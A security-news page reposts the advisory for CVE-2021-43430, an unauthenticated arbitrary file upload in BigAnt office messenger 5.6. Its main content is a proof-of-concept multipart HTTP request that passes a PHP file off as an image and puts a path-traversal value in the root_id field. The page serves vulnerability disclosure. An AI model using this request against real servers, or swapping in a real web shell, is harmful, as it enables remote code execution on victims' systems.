Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-43430: bug/bigant at main · Flash1201/bug

An Access Control vulnerability exists in BigAntSoft BigAnt office messenger 5.6 via im_webserver, which could let a malicious user upload PHP Trojan files.

CVE
#vulnerability#web#windows#apple#git

Permalink

Cannot retrieve contributors at this time

Vulnerability Unauthorized arbitrary file upload (SYSTEM)

https://github.com/Flash1201/bug/blob/main/Vulnerability%20Unauthorized%20arbitrary%20file%20upload%20(SYSTEM).pdf

POST /index.php/Pan/Upload/upload/clientid/4.html?flag=input HTTP/1.1

Host: 192.168.5.25:8000

Content-Length: 1268

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwEAN6czvjjYmBQL

Accept: */*

Origin: http://192.168.5.25:8000

Referer: http://192.168.5.25:8000/index.php/Pan/Index/doc/root_id/BD8455CA-FA46-33C4-BB7C-58D6F580B82F/clientid/4.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="file"; filename="4.php"

Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="root_id"

…/…/…/

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder_id"

0

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder_path_id"

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="folder_path_name"

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="dir_path"

[“”]

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user_id"

4

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="user_name"

Super Admin

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas_id"

355DF852-7D5B-A37A-6D2D-1FD22DED7A57

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="saas_dbname"

antdbms_default

------WebKitFormBoundaryuwEAN6czvjjYmBQL

Content-Disposition: form-data; name="clientid"

4

------WebKitFormBoundaryuwEAN6czvjjYmBQL–

https://github.com/Flash1201/bug/blob/main/2021-11-02_16-56-09.gif

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907